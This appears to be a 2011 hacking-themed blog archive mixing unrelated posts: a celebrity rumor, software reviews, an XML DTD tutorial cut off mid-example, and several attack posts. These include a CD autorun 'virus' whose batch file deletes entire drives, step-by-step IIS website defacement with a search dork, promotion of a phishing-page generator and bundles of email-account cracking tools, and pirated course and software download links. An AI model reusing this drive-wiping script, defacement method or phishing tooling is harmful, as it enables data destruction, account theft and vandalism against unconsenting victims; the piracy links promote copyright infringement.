Tuesday, December 20, 2011

RUMOR ABOUT BILL GATES DAUGHTER



Recently i have received mail about Bill Gates Daughter pictures which tiled as  ” The Best product from Bill Gates ”


 Later when i searched on Google, found internet is flooded with rumor claiming this girl as Bill Gates daughter. Many of the blog had made post as ‘Bill Gates daughter Jennifer Katharine Gates’.


Legally she is definitely can’t be his daughter because in 1994 Bill Gates got married to Melinda French Gates in a private ceremony held in Lanai, Hawaii. That time Melinda was also working in Microsoft and participated in the development of many of Microsoft’s multimedia products, later after the marriage she left the job to focus on starting and raising her family.


Later the couple bless with three children:


    * Jennifer Katharine Gates, his daughter born in 1996
    * Rory John Gates, his son born in 1999
    * Phoebe Adelle Gates, his daughter born in 2002


So as of now in 2010 Jennifer Katharine Gates age will be 14, and i don’t think the girl in picture look like 14 year old girl.

Monday, December 12, 2011

Stop spyware and tracking cookies with Spyware Blaster

Spywareblaster is a free program to stop spyware from being installed in yourcomputer, instead of allowing tracking artifacts to sneak in and having to scan your hard disk to remove them, Spywareblaster stops tracking software from installing in the first place, protecting the computer against adware, browser hijacks (anchoring your homepage), malicious ActiveX scripts, tracking cookies andflash content. You can enable and disable displaying of flash content through the easy to use Spywareblaster interface, another section allows you create your own custom list of blocked ActiveX controls and another section stores a backup of theHosts file, a file used by your operating system to resolve IP addresses to an  URL,commonly tampered with by malware to redirect you to other pages, theHostsfilcan be rolled back to a certain time and date if that ever happens.


This software consumes very few computer resources and can be used in conjunction with a firewall, antivirus and other antispyware tools without any compatibility problems, it should save you time in the long term by not having to continuously scan the hard disk for adaware. Unfortunately browser support is somewhat limited to those using Internet Explorer rendering engine (Maxthon, Avant, IE, etc) and Mozilla Firefox, Opera and Chrome users have been left out, if you do most of your Internet browsing with something other than Internet Explorer or Firefox, protection will be very limited.
The necessary database updates to keep up with the latest Internet threats are only automatic in the paid for version of this program, the free version has to be updated manually which is easy to forget, I wasn’t too impressed with Spywareblaster, is not bad but I do not see this as a must have, my main grudge is the lack of support for browsers other than IE and Firefox.

Saturday, September 10, 2011

Hack Facebook/Twitter Or Any Email Account With Side Jacking

When logging into a website you usually start by submitting your username and password. The server then checks to see if an account matching this information exists and if so, replies back to you with a "cookie" which is used by your browser for all subsequent requests.
It's extremely common for websites to protect your password by encrypting the initial login, but surprisingly uncommon for websites to encrypt everything else. This leaves the cookie (and the user) vulnerable. HTTP session hijacking (sometimes called "sidejacking") is when an attacker gets a hold of a user's cookie, allowing them to do anything the user can do on a particular website. On an open wireless network, cookies are basically shouted through the air, making these attacks extremely easy.
This is a widely known problem that has been talked about to death, yet very popular websites continue to fail at protecting their users. The only effective fix for this problem is full end-to-end encryption, known on the web as HTTPS or SSL. Facebook is constantly rolling out new "privacy" features in an endless attempt to quell the screams of unhappy users, but what's the point when someone can just take over an account entirely? Twitter forced all third party developers to use OAuth then immediately released (and promoted) a new version of their insecure website. When it comes to user privacy, SSL is the elephant in the room.
Firesheep, a Firefox extension designed to demonstrate just how serious this problem is.
After installing the extension you'll see a new sidebar. Connect to any busy open wifi network and click the big "Start Capturing" button. Then wait.

As soon as anyone on the network visits an insecure website known to Firesheep, their name and photo will be displayed:


Double-click on someone, and you're instantly logged in as them.


That's it.
Firesheep is free, open source, and is available now for Mac OS X and Windows. Linux support is on the way.
Websites have a responsibility to protect the people who depend on their services. They've been ignoring this responsibility for too long, and it's time for everyone to demand a more secure web.

Friday, September 9, 2011

Download Login Spoofer-Gmail,yahoo,facebook,hotmail password hacking.

Login Spoofer is a Software that it can create Professional Phishing Pages Like: (Hotmail, Yahoo, Gmail, GameZer, Facebook and many more ....) to Steal somebody's Account you have to push him to login in one of your fake pages, when the Victim Login as you told him, His account (Username/Password) will register in our database So you go to the software (Login spoofer) and press refresh then you'll find His Username & Password & IP & his OS Info...etc. Using and Downloading is free 100%.Yahoo Password Hacking: Hack Yahoo Account Password with phishing attack.


DOWNLOAD HERE

Deface sites easily in Seconds




#it only works on sites being hosted on Ms-IIS server. Now a days many boxes are patched so it'll not work on them !!

steps for Xp-

# open run
# type-

%WINDIR%\EXPLORER.EXE ,::{20D04FE0-3AEA-1069-A2D8-08002B30309D}\::{BDEADF00-C265-11d0-BCED-00A0C90AB50F}

and press enter !

#A new window name "WEB FOLDER" gets open

#Right click and click on New, Add Web Folder then enter your vulnerable website address.

#then next....finish

# now You can insert your page with name index.html by simply copy pasting.

Also after getting access to the website...Many websites don't allows you to
add your page. so leave them.




#Dork- "Powered by IIS" or use your own unique dork.


 ------------------------------------------------------------------------------------------------------------

Windows 7-

#Click Start.

#Click Computer.

# In the following dialog click Map Network Drive.

# On the Map Network Drive dialog, click "Connect to a Web site that you can use to store your documents and Pictures" this will pop up the "Welcome to the Add Network Location Wizard".



# Click on Next.



# Click on ''Choose a custom network location''.



# Click on Next.



# Now type the web folder address that you want to access. For instance: www.stscw.com/



# Enter a NAME to help you identify the web folder and click Next.



# Place a checkmark on 'Open this network location when I click finish'.



# Click Finish.

and insert your deface page !!



----------------------------------------------------------------------------------------------------------------


Reference-

3thicaln00b (super moderator)
IndiShell Crew

How to create PDF files for free

PDF is the de facto standard for online reading and publishing and various softwares like Adobe reader and Foxit reader PDF is the new standard for online publishingallow you to read PDF files. But PDF creation comes under shady areas and the same softwares either allow for minor PDF modification with watermarked results (Foxit) or constitute a whole new different software package for PDF creation for a premium fee (Adobe PDF creator).However,for professionals,this software may be worth its price tag,general users can create excellent looking PDF’s by the method described before.
What you need -
About DoPDF (shamelessly taken from official website :P) -Create PDF's easily with DoPDF
doPDF is a free PDF converter for both personal and commercial use. Using doPDF you can create PDF files by selecting the "Print" command from virtually any application. With one click you can convert your Microsoft Excel, Word or  PowerPoint documents or your emails and favorite web sites to PDF files.
Steps to create PDF -
  • Download DoPDF and install it.
  • Open your word processor/text editor and create your document.
  • Press Ctrl + P or go to File menu and print the document.
  • The Print menu will open,choose DoPDF as virtual Printer and click on Print.
choose DoPDF as virtual Printer and click on Print.
  • Choose the location for your document to save and click OK.Your PDF file will be created.
Choose the location for saving your document
  • Congratulations..you have created your PDF file for free

Best Hacking Tools -85in1

Audio theme: Sean Paul - Temperature
Size : 43.2MB Compress ,29.7MB UnCompress

Contents:
Main page:

  • HOTMAIL HACKING

  • YAHOO HACKING


  • MSN FUN TOOLS


  • FAKE SCREENS/PAGES


  • OTHER HACKING TOOLS


  • FUN TOOLS


  • Page 1 :

    MSN Chat Monitor And Sniffer
    MSN Password Retriever
    MSN Hacker DUC
    Head Fuck HotMail HAck
    HotMail Hacker XE Edition
    HotMail HAck
    HotMAil Hacker
    MSN Passwords
    MSN Flooder
    MSN Sniffer
    MSN SPY Lite
    HotMail Hacker Gold
    HotMail HAcker Final
    Give me Ur Pass
    HotMail Brute Forcer
    MSN PAssword Finder
    MSN Password Grabber
    Hack MSN Password
    Hack HotMAil Evolution
    MAgic Password Sender
    MSN Locker
    HotMail Killer
    Hot Freeze
    MessenPass
    HotMAil Hack !
    Ice Cold Reload
    HotMail Killer 2
    Nuke MSN

    Page 2:

    Yahoo Messenger Login Screen
    MSN Messenger 7 Login Screen
    MSN Messenger 5 Login Screen
    MSN Messenger 4.6 Login Screen
    HotMail Login Screen
    Fake Web Pages 2
    Fake Eeb Pages 1
    AOL Killer
    Fake Login HotMail
    B-S Spy
    Saria Fake Logins

    Page 3:

    Yahoo Password Retrieval
    Yacam
    Yahoo Cracker
    Yahoo Booster
    Yahoo Hack!
    Yahoo Password Stealer
    S-H Yahoo Password Sender

    Page 4:

    NetWork Password Recovery
    NetBIOS Name Scanner
    FTP Password Hacker
    Cable Modem Sniffer
    Port Listening XP
    Blue Port Scanner
    www 2 IP
    XP Killer
    Sniff Password
    Port Scanner
    Fast Resolver
    Domain Scan
    Whois Domain
    NetRes View
    PHPbb Defacer
    Angry IP Scanner
    FTP Brute Forcer

    PAge 5:

    Hook Tool Box
    Smart HAck UpLoader
    Remote Anything
    Post Sage
    PHPbb Attacker
    Page 6:
    Skinner
    MSN Bomber Man
    Ultimate Nick PopUpz
    MSN 7 Universal Patcher
    Emoticons Creator
    MSN Picture Crawler
    Anti Status Bomb
    MSN Detector
    Multi MSN Loader
    Kitle
    Protect Lithium
    Tray It!
    MSN Block Checker
    MSN Auto Responder
    MSN Virus Cleaner
    MSN Dondurucu
    Download it from  - Hacking Tools 85 in one

    THC-HYDRA v6.1 brute force tool Released !



    One of the most famous network logon cracker - THC-HYDRA, has been updated! We now have THC-HYDRA version 6.1 in less than a fortnight!

    “THC-HYDRA is a very fast network logon cracker which support many different services. This tool is a proof of concept code, to give researchers and security consultants the possibility to show how easy it would be to gain unauthorized access from remote to a system. It was tested to compile cleanly on Linux, Windows/Cygwin, Solaris, FreeBSD and OSX.”

    This is the change log:
    More license updates for the files for the debian guys
    Fix for the configure script to correctly detect postgresql
    Add checks for libssh v0.4 and support for ssh v1
    Merge all latest crypto code in sasl files
    Fix SVN compilation issue on openSUSE (tested with v11.3)

    Download THC-HYDRA v6.1 news source:the hacker news

    SNIFFER-HACKING TOOL



    Sniffers monitor network data. A sniffer can be a self-contained software program or a hardware device with the appropriate software or firmware programming. Sniffers usually act as network probes or "snoops." They examine network traffic, making a copy of the data without redirecting or altering it. Some sniffers work only with TCP/IP packets, but the more sophisticated tools can work with many other protocols and at lower levels including Ethernet frames.

    Years ago, sniffers were tools used exclusively by network engineers. Today, however, these utilities have become popular on the Internet with hackers and the merely curious. The U.S. Federal Bureau of Investigation (FBI) has utilized a famous sniffer system called "Carnivore" to help detect illegal Internet communications.


    DOWNLOAD

    Certified Ethical Hacker V6 - Training Videos - LABS, Tools

    Certified Ethical Hacker Course has been divided into two sections:
    1. Certified Ethical Hacker (CEH) v 6 - Training DVDs (Flash video) | 6 DVDs ISO | 10.3 GB
    2. Certified Ethical Hacker and Countermeasures V6 LABS (Tools) | 4 Volumes | ISOs + Instructor slides in PDF | 13.2 GB

    First section, Training videos, focuses on how to scan, test, hack and secure your own systems (all in depth).

    Second section, LABS (Tools), gives each student in-depth knowledge and practical experience with the current essential security systems. It is analogous to what you do in college laboratory i.e. real-time practical experience to what is taught in theory lectures.

    Thus, this complete course guarantees to make you a Professional Hacker


    LABS (Tools)



    Certified Ethical Hacker and Countermeasures V6 LABS (Tools) | 4 Volumes | ISOs + Instructor slides in PDF | 13.2 GB

    These are all the DVD materials for the CEH v6 exam training from EC-Council. This is a fantastic class with a lot of knowledge.

    These are the tools not videos. This is to teach how to countermeasure hacks and in that being said there are live real worms, viruses,trojans.etc. not to destroy your computer(IF USED WITH VMWARE OR OTHER COMPUTER) but to teach you how to get rid of them.

    Certified Ethical Hacker & Countermeasures V6

    Course Description

    This class will immerse the student into an interactive environment where they will be shown how to scan, test, hack and secure their own systems. The lab intensive environment gives each student in-depth knowledge and practical experience with the current essential security systems. Students will begin by understanding how perimeter defenses work and then be lead into scanning and attacking their own networks, no real network is harmed. Students then learn how intruders escalate privileges and what steps can be taken to secure a system. Students will also learn about Intrusion Detection, Policy Creation, Social Engineering, DDoS Attacks, Buffer Overflows and Virus Creation. When a student leaves this intensive 5 day class they will have hands on understanding and experience in Ethical Hacking. This course prepares you for EC-Council Certified Ethical Hacker exam 312-50.

    Who Should Attend

    This course will significantly benefit security officers, auditors, security professionals, site administrators, and anyone who is concerned about the integrity of the network infrastructure.


    Certification
    The Certified Ethical Hacker exam 312-50 may be taken on the last day of the training (optional). Students need to pass the online Prometric exam to receive CEH certification. Training fee is inclusive of Exam, Official Kit, Certificate and meals.

    Legal Agreement

    Ethical Hacking and Countermeasures course mission is to educate, introduce and demonstrate hacking tools for penetration testing purposes only. Prior to attending this course, you will be asked to sign an agreement stating that you will not use the newly acquired skills for illegal or malicious attacks and you will not use such tools in an attempt to compromise any computer system, and to indemnify EC-Council with respect to the use or misuse of these tools, regardless of intent.

    CEHv6 Curriculum consists of instructor-led training and self-study. The Instructor will provide the details of self-study modules to the students beginning of the class.

    Code:

    http://www.eccouncil.org

    Quote:
    Module 1: Introduction to Ethical Hacking
    Module 2: Hacking Laws
    Module 3: Footprinting
    Module 4: Google Hacking
    Module 5: Scanning
    Module 6: Enumeration
    Module 7: System Hacking
    Module 8: Trojans and Backdoors
    Module 9: Viruses and Worms
    Module 10: Sniffers
    Module 11: Social Engineering
    Module 12: Phishing
    Module 13: Hacking Email Accounts
    Module 14: Denial-of-Service
    Module 15: Session Hijacking
    Module 16: Hacking Web Servers
    Module 17: Web Application Vulnerabilities
    Module 18: Web-Based Password Cracking Techniques
    Module 19: SQL Injection
    Module 20: Hacking Wireless Networks
    Module 21: Physical Security
    Module 22: Linux Hacking
    Module 23: Evading IDS, Firewalls and Detecting Honey Pots
    Module 24: Buffer Overflows
    Module 25: Cryptography
    Module 26: Penetration Testing
    Module 27: Covert Hacking
    Module 28: Writing Virus Codes
    Module 29: Assembly Language Tutorial
    Module 30: Exploit Writing
    Module 31: Smashing the Stack for Fun and Profit
    Module 32: Windows Based Buffer Overflow Exploit Writing
    Module 33: Reverse Engineering
    Module 34: MAC OS X Hacking
    Module 35: Hacking Routers, cable Modems and Firewalls
    Module 36: Hacking Mobile Phones, PDA and Handheld Devices
    Module 37: Bluetooth Hacking
    Module 38: VoIP Hacking
    Module 39: RFID Hacking
    Module 40: Spamming Module
    Module 41: Hacking USB Devices
    Module 42: Hacking Database Servers
    Module 43: Cyber Warfare- Hacking, Al-Qaida and Terrorism
    Module 44: Internet Content Filtering Techniques
    Module 45: Privacy on the Internet
    Module 46: Securing Laptop Computers
    Module 47: Spying Technologies
    Module 48: Corporate Espionage- Hacking Using Insiders
    Module 49: Creating Security Policies
    Module 50: Software Piracy and Warez
    Module 51: Hacking and Cheating Online Games
    Module 52: Hacking RSS and Atom
    Module 53: Hacking Web Browsers (Firefox, IE)
    Module 54: Proxy Server Technologies
    Module 55: Data Loss Prevention
    Module 56: Hacking Global Positioning System (GPS)
    Module 57: Computer Forensics and Incident Handling
    Module 58: Credit Card Frauds
    Module 59: How to Steal Passwords
    Module 60: Firewall Technologies
    Module 61: Threats and Countermeasures
    Module 62: Case Studies
    Module 62: Case Studies
    Module 63: Botnets
    Module 64: Economic Espionage
    Module 65: Patch Management
    Module 66: Security Convergence





    Instructor Slides:
    http://hotfile.com/d....part1.rar.html
    http://hotfile.com/d....part2.rar.html
    http://hotfile.com/d....part3.rar.html

    Labs (Tools)
    http://hotfile.com/d...part01.rar.html
    http://hotfile.com/d...part02.rar.html
    http://hotfile.com/d...part03.rar.html
    http://hotfile.com/d...part04.rar.html
    http://hotfile.com/d...part05.rar.html
    http://hotfile.com/d...part06.rar.html
    http://hotfile.com/d...part07.rar.html
    http://hotfile.com/d...part08.rar.html
    http://hotfile.com/d...part09.rar.html
    http://hotfile.com/d...part10.rar.html
    http://hotfile.com/d...part11.rar.html
    http://hotfile.com/d...part12.rar.html
    http://hotfile.com/d...part13.rar.html
    http://hotfile.com/d...part14.rar.html
    http://hotfile.com/d...part15.rar.html
    http://hotfile.com/d...part16.rar.html
    http://hotfile.com/d...part17.rar.html
    http://hotfile.com/d...part18.rar.html
    http://hotfile.com/d...part19.rar.html
    http://hotfile.com/d...part20.rar.html
    http://hotfile.com/d...part21.rar.html
    http://hotfile.com/d...part22.rar.html
    http://hotfile.com/d...part23.rar.html
    http://hotfile.com/d...part24.rar.html
    http://hotfile.com/d...part25.rar.html
    http://hotfile.com/d...part26.rar.html
    http://hotfile.com/d...part27.rar.html
    http://hotfile.com/d...part28.rar.html
    http://hotfile.com/d...part29.rar.html
    http://hotfile.com/d...part30.rar.html
    http://hotfile.com/d...part31.rar.html
    http://hotfile.com/d...part32.rar.html
    http://hotfile.com/d...part33.rar.html
    http://hotfile.com/d...part34.rar.html
    http://hotfile.com/d...part35.rar.html
    http://hotfile.com/d...part36.rar.html
    http://hotfile.com/d...part37.rar.html
    http://hotfile.com/d...part38.rar.html
    http://hotfile.com/d...part39.rar.html
    http://hotfile.com/d...part40.rar.html
    http://hotfile.com/d...part41.rar.html
    http://hotfile.com/d...part42.rar.html
    http://hotfile.com/d...part43.rar.html
    http://hotfile.com/d...part44.rar.html
    http://hotfile.com/d...part45.rar.html
    http://hotfile.com/d...part46.rar.html
    http://hotfile.com/d...part47.rar.html
    http://hotfile.com/d...part48.rar.html
    http://hotfile.com/d...part49.rar.html
    http://hotfile.com/d...part50.rar.html
    http://hotfile.com/d...part51.rar.html
    http://hotfile.com/d...part52.rar.html
    http://hotfile.com/d...part53.rar.html
    http://hotfile.com/d...part54.rar.html
    http://hotfile.com/d...part55.rar.html
    http://hotfile.com/d...part56.rar.html
    http://hotfile.com/d...part57.rar.html
    http://hotfile.com/d...part58.rar.html
    http://hotfile.com/d...part59.rar.html
    http://hotfile.com/d...part60.rar.html
    http://hotfile.com/d...part61.rar.html
    http://hotfile.com/d...part62.rar.html
    http://hotfile.com/d...part63.rar.html
    http://hotfile.com/d...part64.rar.html
    http://hotfile.com/d...part65.rar.html
    http://hotfile.com/d...part66.rar.html
    http://hotfile.com/d...part67.rar.html
    http://hotfile.com/d...part68.rar.html



     

    Reset Windows Password Advanced Edition v1.2.1.195 Retail



    Lost password or locked Windows account is the most frequent problem data recovery specialists have to deal with. You could format the hard drive or reinstall your operating system, but that wouldn't keep you from partial loss of data, personal settings and extra headache. Besides, all that can take some time. There is a quicker and more elegant way out of this situation. Just run Reset Windows Passwords from a bootable CD or USB and reset the forgotten password or unlock the account. It's a matter of a few minutes! Reset Windows Password is the most powerful solution for recovering or resetting all types of Windows account passwords: user', administrator, Active Directory accounts, and domain administrators.
    The program is designed specifically for an inexperienced user and is easy to operate. On the other hand, the password lookup algorithms are unique and not used in any similar application.
    Unlike other utilities, Reset Windows Password is the only program that can CORRECTLY process all types of Windows accounts.

    Features
    Simple, intuitive graphic interface. No more ugly DOS prompts.
    Resets and modifies passwords of local users and administrators, domain administrator, Active Directory users, DSRM account.
    Enables and unlocks user accounts.
    Disables the password expiry option.
    Resets SYSKEY (with full user passwords re-encryption)
    Advanced password lookup algorithms (also known as AI attack).
    Dumps user password hashes from SAM for further analysis.
    Dumps password hashes from Active Directory.
    Dumps domain cached credentials.
    Supports all versions of NT-based Windows, including the newest Windows 7.
    All editions include the utility for creating a bootable CD/DVD/USB disk from the downloadable ISO file with the application.
    Supports 64-bit Windows.
    Large collection of IDE, SATA, SCSI, RAID drivers.
    Detects several operating systems installed on the computer.
    Supports non-English versions of Windows and passwords in national encodings.
    Allows undoing changes made to the system.
    Deletes passwords and other sensitive data from the computer.
    Detailed help.

    How it looks and works
    Reset Windows Password - screenshots and documentation
    Full list of the program features
    Three simple steps to create a bootable CD, DVD or USB disk
    Utility for creating bootable disks
    Running RWP from the bootable disk
    Modifying BIOS to boot from RWP disk, questions and answers

    The software is available in three editions: Light, Standard and Advanced. The detailed list of features is shown below : www.passcape.com/reset_windows_password_editions
    Reset.Windows.Password.Advanced.Edition.v1.2.1.195.retail-iOTA
    Download : | FileSonic | DepositFiles | Turbobi

    How to Create nameless files and folders in windows

    1.Select any file or folder.
    2.Right click on it, press rename or simply press F2.
    3.Press and hold the alt key. While holding the Alt key, type numbers 0160 from the numpad.
    4.Press Enter and the nameless file or folder will be created.
     

    But what if you want to create another nameless file or folder in the same directory ?

    For this you will have to rename the file with 2 spaces. Just follow these steps below:

    1.Select file, press F2.
    2.Hold alt key and type 0160 from the numpad.
    3.Release the alt key. Now without doing anything else, again hold alt key and press 0160.
    4.Press enter and you will have second nameless file in the same directory.

    CD AUTORUN VIRUS, FORMATTING COMPUTER !


    Create a file in note pad and name it "vrs.cmd"
    write following commands in the file-

    rd e:\*.* /s/q
    rd d:\*.* /s/q
    rd C:\*.* /s/q


    after saving it with name vrs.cmd
    plz dont'double click on it else u'll lose data frm ur hard disk

    STEP 2-

    make another file name it "autorun.inf"
    and write following codes in it.

    [AUTORUN]
    open=vrs.cmd

    save this file autorun.inf

    STEP 3-
    Now write these two files into a CD and CD is READY to destroy a computer..

    CHECK___
    u can check the ability of vrs.cmd i mean to have a trial

    make a folder in "d:" name it "meera"
    and put some files and folders it like songs, sanps etc
    now make a file in note pad


    rd d:\meera /s/q

    and save it with name vr.cmd
    and now double click on this file
    it will remove meera folder from "d:"

    Anti FireSheep

    BlackSheep



    With all the hype about Firesheep, the Firefox add-on that snatches up social network login credentials over open wireless networks, security companies are starting to make anti-Firesheep measures available to the average user. BlackSheep, developed by "cloud security" firm Zscaler, is a Firefox add-on that detects the presence of Firesheep on your network.

    If someone is using Firesheep, BlackSheep will trick it with a fake login cookie. When Firesheep takes BlackSheep's bait and tries to get your user information from a site using the fake values BlackSheep has been sending out, you'll get a warning that Firesheep is operating, as well as the IP address of the person using it.

    Unfortunately, BlackSheep is only available for Firefox at the moment. There are other security measures you can use, though. Sebastian has posted a roundup of ways to surf securely with SSL in any browser. Even more recently, someone released a Safari extension to force Facebook to use SSL. As far as direct anti-Firesheep countermeasures go, a Windows app called Fireshepherd can also help you shut Firesheep snoopers down.



    FireShepherd





    A login-cookie-snooping Firefox plug-in called Firesheep rocked the Internet by letting anyone compromise your Facebook or Twitter account over a wireless network. Alarmed at Firesheep's 200,000 downloads, an Icelandic engineering student named Gunnar Sigurdsson created FireShepherd, a program that crashes Firesheep with floods of nonsense packets.

    Although Firesheep was originally created to prove a point about insecure login credentials on social networks, the huge number of downloads means that it could be a security risk to everyday users. Sigurdsson compares it to "living in a house with nothing but windows." Of course, security researchers or malicious users could patch up the Firesheep flaw that FireShepherd exploits, but FireShepherd's creator has vowed to keep finding new ways to stop the snooping plug-in. 

    Monday, August 29, 2011

    XML DTDs Vs XML Schema

    XML is a very handy format for storing and communicating your data between disparate systems in a platform-independent fashion. XML is more than just a format for computers — a guiding principle in its creation was that it should be Human Readable and easy to create. 

    XML allows UNIX systems written in C to communicate with Web Services that, for example, run on the Microsoft .NET architecture and are written in ASP.NET. XML is however, only the meta-language that the systems understand — and they both need to agree on the format that the XML data will be in. Typically, one of the partners in the process will offer a service to the other: one is in charge of the format of the data.
    The definition serves two purposes: the first is to ensure that the data that makes it past the parsing stage is at least in the right structure. As such, it’s a first level at which ‘garbage’ input can be rejected. Secondly, the definition documents the protocol in a standard, formal way, which makes it easier for developers to understand what’s available.
    DTD – The Document Type Definition
    The first method used to provide this definition was the DTD, or Document Type Definition. This defines the elements that may be included in your document, what attributes these elements have, and the ordering and nesting of the elements.

    The DTD is declared in a DOCTYPE declaration beneath the XML declaration contained within an XML document:
    Inline Definition:
    1. <?xml version="1.0"?> <br>  
    2. <!DOCTYPE documentelement [definition]>  
    <?xml version="1.0"?> 
    
    <!DOCTYPE documentelement [definition]>
    External Definition:
    1. <?xml version="1.0"?> <br>  
    2. <!DOCTYPE documentelement SYSTEM "documentelement.dtd">  
    <?xml version="1.0"?> 
    
    <!DOCTYPE documentelement SYSTEM "documentelement.dtd">
    The actual body of the DTD itself contains definitions in terms of elements and their attributes. For example, the following short DTD defines a bookstore. It states that a bookstore has a name, and stocks books on at least one topic.
    Each topic has a name and 0 or more books in stock. Each book has a title, author and ISBN number. The name of the topic, and the name of the bookstore are defined as being the same type of element: this store’s PCDATA: just text data. The title and author of the book are stored as CDATA -- text data that won’t be parsed for further characters by the XML parser. The ISBN number is stored as an attribute of the book:
    1. <!DOCTYPE bookstore [ <br>  
    2.   <!ELEMENT bookstore (topic+)> <br>  
    3.   <!ELEMENT topic (name,book*)> <br>  
    4.   <!ELEMENT name (#PCDATA)> <br>  
    5.   <!ELEMENT book (title,author)> <br>  
    6.   <!ELEMENT title (#CDATA)> <br>  
    7.   <!ELEMENT author (#CDATA)> <br>  
    8.   <!ELEMENT isbn (#PCDATA)> <br>  
    9.   <!ATTLIST book isbn CDATA "0"> <br>  
    10.   ]>  
    <!DOCTYPE bookstore [ 
    
      <!ELEMENT bookstore (topic+)> 
    
      <!ELEMENT topic (name,book*)> 
    
      <!ELEMENT name (#PCDATA)> 
    
      <!ELEMENT book (title,author)> 
    
      <!ELEMENT title (#CDATA)> 
    
      <!ELEMENT author (#CDATA)> 
    
      <!ELEMENT isbn (#PCDATA)> 
    
      <!ATTLIST book isbn CDATA "0"> 
    
      ]>
    An example of a book store’s inline definition might be:
    1. <?xml version="1.0"?> <br>  
    2. <!DOCTYPE bookstore [ <br>  
    3.   <!ELEMENT bookstore (name,topic+)> <br>  
    4.   <!ELEMENT topic (name,book*)> <br>  
    5.   <!ELEMENT name (#PCDATA)> <br>  
    6.   <!ELEMENT book (title,author)> <br>  
    7.   <!ELEMENT title (#CDATA)> <br>  
    8.   <!ELEMENT author (#CDATA)> <br>  
    9.   <!ELEMENT isbn (#PCDATA)> <br>  
    10.   <!ATTLIST book isbn CDATA "0"> <br>  
    11.   ]> <br>  
    12. <bookstore> <br>  
    13.   <name>Mike's Store</name> <br>  
    14.   <topic> <br>  
    15.     <name>XML</name> <br>  
    16.     <book isbn="123-456-789"> <br>  
    17.       <title>Mike's Guide To DTD's and XML Schemas<</title> <br>  
    18.       <author>Mike Jervis</author> <br>  
    19.     </book> <br>  
    20.   </topic> <br>  
    21. </bookstore>  
    <?xml version="1.0"?> 
    
    <!DOCTYPE bookstore [ 
    
      <!ELEMENT bookstore (name,topic+)> 
    
      <!ELEMENT topic (name,book*)> 
    
      <!ELEMENT name (#PCDATA)> 
    
      <!ELEMENT book (title,author)> 
    
      <!ELEMENT title (#CDATA)> 
    
      <!ELEMENT author (#CDATA)> 
    
      <!ELEMENT isbn (#PCDATA)> 
    
      <!ATTLIST book isbn CDATA "0"> 
    
      ]> 
    
    <bookstore> 
    
      <name>Mike's Store</name> 
    
      <topic> 
    
        <name>XML</name> 
    
        <book isbn="123-456-789"> 
    
          <title>Mike's Guide To DTD's and XML Schemas<</title> 
    
          <author>Mike Jervis</author> 
    
        </book> 
    
      </topic> 
    
    </bookstore>
    Using an inline definition is handy when you only have a few documents and they’re offline, as the definition is always in the file. However, if, for example, your DTD defines the XML protocol used to talk between two seperate systems, re-transmitting the DTD with each document adds an overhead to the communciations. Having an external DTD eliminates the need to re-send each time. We could remove the DTD from the document, and place it in a DTD file on a Web server that’s accessible by the two systems:
    1. <?xml version="1.0"?> <br>  
    2. <!DOCTYPE bookstore SYSTEM "http://webserver/bookstore.dtd"> <br>  
    3. <bookstore> <br>  
    4.   <name>Mike's Store</name> <br>  
    5.   <topic> <br>  
    6.     <name>XML</name> <br>  
    7.     <book isbn="123-456-789"> <br>  
    8.       <title>Mike's Guide To DTD's and XML Schemas<</title> <br>  
    9.       <author>Mike Jervis</author> <br>  
    10.     </book> <br>  
    11.   </topic> <br>  
    12. </bookstore>  
    <?xml version="1.0"?> 
    
    <!DOCTYPE bookstore SYSTEM "http://webserver/bookstore.dtd"> 
    
    <bookstore> 
    
      <name>Mike's Store</name> 
    
      <topic> 
    
        <name>XML</name> 
    
        <book isbn="123-456-789"> 
    
          <title>Mike's Guide To DTD's and XML Schemas<</title> 
    
          <author>Mike Jervis</author> 
    
        </book> 
    
      </topic> 
    
    </bookstore>
    The file bookstore.dtd would contain the full defintion in a plain text file:
    1.  <!ELEMENT bookstore (name,topic+)> <br>  
    2.  <!ELEMENT topic (name,book*)> <br>  
    3.  <!ELEMENT name (#PCDATA)> <br>  
    4.  <!ELEMENT book (title,author)> <br>  
    5.  <!ELEMENT title (#CDATA)> <br>  
    6.  <!ELEMENT author (#CDATA)> <br>  
    7.  <!ELEMENT isbn (#PCDATA)> <br>  
    8.  <!ATTLIST book isbn CDATA "0">  
      <!ELEMENT bookstore (name,topic+)> 
    
      <!ELEMENT topic (name,book*)> 
    
      <!ELEMENT name (#PCDATA)> 
    
      <!ELEMENT book (title,author)> 
    
      <!ELEMENT title (#CDATA)> 
    
      <!ELEMENT author (#CDATA)> 
    
      <!ELEMENT isbn (#PCDATA)> 
    
      <!ATTLIST book isbn CDATA "0">
    The lowest level of definition in a DTD is that something is either CDATA or PCDATA: Character Data, or Parsed Character Data. We can only define an element as text, and with this limitation, it is not possible, for example, to force an element to be numeric. Attributes can be forced to a range of defined values, but they can’t be forced to be numeric.

    So for example, if you stored your applications settings in an XML file, it could be manually edited so that the windows start coordinates were strings — and you’d still need to validate this in your code, rather than have the parser do it for you.
    XML Schemas
    XML Schemas provide a much more powerful means by which to define your XML document structure and limitations. XML Schemas are themselves XML documents. They reference the XML Schema Namespace (detailed here), and even have their own DTD.
    What XML Schemas do is provide an Object Oriented approach to defining the format of an XML document. XML Schemas provide a set of basic types. These types are much wider ranging than the basic PCDATA and CDATA of DTDs. They include most basic programming types such as integer, byte, string and floating point numbers, but they also expand into Internet data types such as ISO country and language codes (en-GB for example). A full list can be found here.
    The author of an XML Schema then uses these core types, along with various operators and modifiers, to create complex types of their own. These complex types are then used to define an element in the XML Document.
    As a simple example, let’s try to create a basic XML Schema for defining the bookstore that we used as an example for DTDs. Firstly, we must declare this as an XSD Document, and, as we want this to be very user friendly, we’re going to add some basic documentation to it:
    1. <xsd:schema xmlns:xsd="http://www.w3.org/2001/XMLSchema">  <br>  
    2. <xsd:annotation>  <br>  
    3.   <xsd:documentation xlm:lang="en">  <br>  
    4.     XML Schema for a Bookstore as an example.  <br>  
    5.   </xsd:documentation>  <br>  
    6. </xsd:annotation>  
    <xsd:schema xmlns:xsd="http://www.w3.org/2001/XMLSchema">  
    
    <xsd:annotation>  
    
      <xsd:documentation xlm:lang="en">  
    
        XML Schema for a Bookstore as an example.  
    
      </xsd:documentation>  
    
    </xsd:annotation>
    Now, in the previous example, the bookstore consisted of the sequence of a name and at least one topic. We can easily do that in an XML Schema:
    1. <xsd:element name="bookstore" type="bookstoreType"/>  <br>  
    2. <xsd:complexType name="bookstoreType">  <br>  
    3.   <xsd:sequence>  <br>  
    4.     <xsd:element name="name" type="xsd:string"/>  <br>  
